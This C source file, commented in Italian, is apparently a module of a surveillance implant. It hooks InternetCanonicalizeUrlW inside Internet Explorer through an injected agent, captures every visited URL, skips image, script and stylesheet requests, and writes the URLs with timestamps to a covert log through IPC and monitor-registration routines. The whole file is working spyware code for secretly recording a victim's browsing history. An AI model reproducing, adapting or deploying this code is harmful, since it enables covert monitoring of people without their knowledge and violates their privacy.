#define MAXURLLEN 256
BOOL bPM_UrlLogStarted = FALSE; // Flag che indica se il monitor e' attivo o meno
char last_url[MAXURLLEN];

typedef struct {
	COMMONDATA;
} InternetCanonicalizeUrlStruct;
InternetCanonicalizeUrlStruct InternetCanonicalizeUrlData;

typedef struct {
	char szUrlName[MAXURLLEN];
} IPCUrlStruct;

// -- Wrapper InternetCanonicalizeUrlW
static DWORD _stdcall PM_InternetCanonicalizeUrl(DWORD ARG1,
									             DWORD ARG2,
									             DWORD ARG3,
									             DWORD ARG4)
{
	IPCUrlStruct IPCUrlData;
	char *pTmp;
	DWORD i,j;
	BOOL *Active;
	
	MARK_HOOK

	pTmp = NULL;

	INIT_WRAPPER(InternetCanonicalizeUrlStruct);

	CALL_ORIGINAL_API(4);

	Active = (BOOL *)pData->pHM_IpcCliRead(PM_URLLOG);

	// Controlla se il monitor e' attivo e se la funzione e' andata a buon fine
	if (!Active || !(*Active) || !ret_code)
		return ret_code;
	
	pTmp = (char *)ARG2;
	
	if( !pTmp || !((DWORD)pData->pHM_IpcCliWrite))
		return ret_code;

	// Unicode
	if (pTmp[1]==0) {
		for (i=0, j=0; i<(MAXURLLEN-1); i++, j+=2) {
			IPCUrlData.szUrlName[i] = pTmp[j];
			if (IPCUrlData.szUrlName[i] == 0)
				break;
		}
	} else { // Ascii
		for (i=0, j=0; i<(MAXURLLEN-1); i++, j++) {
			IPCUrlData.szUrlName[i] = pTmp[j];
			if (IPCUrlData.szUrlName[i] == 0)
				break;
		}
	}

	// Forza la terminazione
	IPCUrlData.szUrlName[i] = 0;
  
	pData->pHM_IpcCliWrite(PM_URLLOG, (BYTE *)&IPCUrlData, sizeof(IPCUrlStruct), 0);

	return ret_code;
}


static DWORD PM_InternetCanonicalizeUrl_setup(HMServiceStruct * pData)
{
	char proc_path[DLLNAMELEN];
	char *proc_name;
	HMODULE hMod;

	ZeroMemory(proc_path, sizeof(proc_path));
	GetModuleFileName(NULL, proc_path, sizeof(proc_path)-1);
	proc_name = strrchr(proc_path, '\\');
	if (proc_name) {
		proc_name++;
		if (stricmp(proc_name, "iexplore.exe") && stricmp(proc_name, "iexplorer.exe"))
			return 1; // Hooka solo internet explorer
	} else
		return 1;

	InternetCanonicalizeUrlData.pHM_IpcCliRead = pData->pHM_IpcCliRead;
	InternetCanonicalizeUrlData.pHM_IpcCliWrite = pData->pHM_IpcCliWrite;
	InternetCanonicalizeUrlData.dwHookLen = 900;
	return 0;	
}


BOOL is_interesting_url(char *url)
{
   DWORD i = 0;
   char *ext, *p;
   char *extlist[] = { ".bmp", ".BMP",
                       ".jpg", ".JPG",
                       ".gif", ".GIF",
                       ".png", ".PNG",
                       ".css", ".CSS",
                       ".ico", ".ICO",
                       ".js", ".JS",
                       NULL };

   while(ext = extlist[i++]) {
      if((p = strstr(url, ext)) && ((p[strlen(ext)] == '\0') || (p[strlen(ext)] == '?'))) {
         return FALSE;
      }
   }

   return TRUE;
}


DWORD __stdcall PM_UrlLogDispatch(BYTE * msg, DWORD dwLen, DWORD dwFlags, FILETIME *dummy)
{
	// Se il monitor e' stoppato non esegue la funzione di dispatch
	// Il controllo e' ridondante perche', se il monitor e' stoppato,
	// l'agent iniettato non inserisce i messaggi nella coda IPC
	if (!bPM_UrlLogStarted)
		return 0;

	// Solo se c'e' qualcosa da scrivere
	if ( ((IPCUrlStruct *) msg)->szUrlName[0] == 0)
		return 1;

	// Vede se e' un url interessante (no gif, jpg, etc.)
	if (!is_interesting_url(((IPCUrlStruct *) msg)->szUrlName))
		return 1;

	// Solo se non e' lo stesso URL di prima
	if (!strncmp(last_url, ((IPCUrlStruct *) msg)->szUrlName, MAXURLLEN-1))
		return 1;
	_snprintf_s(last_url, sizeof(last_url), _TRUNCATE, "%s", ((IPCUrlStruct *) msg)->szUrlName);

	// Costruisce e scrive il log 
	bin_buf tolog;
	struct tm tstamp;
	DWORD delimiter = ELEM_DELIMITER;
	GET_TIME(tstamp);
	tolog.add(&tstamp, sizeof(tstamp));
	tolog.add(((IPCUrlStruct *) msg)->szUrlName, strlen(((IPCUrlStruct *) msg)->szUrlName)+1);
	tolog.add(&delimiter, sizeof(DWORD));

	LOG_ReportLog(PM_URLLOG, tolog.get_buf(), tolog.get_len());
	return 1;
}


DWORD __stdcall PM_UrlLogStartStop(BOOL bStartFlag)
{
	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_UrlLogStarted == bStartFlag)
		return 0;

	// I log va inizializzato come prima cosa...
	if (bStartFlag && !LOG_InitAgentLog(PM_URLLOG))
		return 0;

	// bStartFlag e' TRUE se il monitor deve essere attivato
	bPM_UrlLogStarted = bStartFlag;
	AM_IPCAgentStartStop(PM_URLLOG, bStartFlag);

	// ...e va chiuso come ultima
	if (!bStartFlag)
		LOG_StopAgentLog(PM_URLLOG);
		
	return 1;
}


DWORD __stdcall PM_UrlLogInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	PM_UrlLogStartStop(bStartFlag);
	last_url[0] = 0;
	return 1;
}


void PM_UrlLogRegister()
{
	// L'hook viene registrato dalla funzione HM_InbundleHooks
	AM_MonitorRegister(PM_URLLOG, (BYTE *)PM_UrlLogDispatch, (BYTE *)PM_UrlLogStartStop, (BYTE *)PM_UrlLogInit, NULL);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_UrlLogInit(NULL, FALSE);
}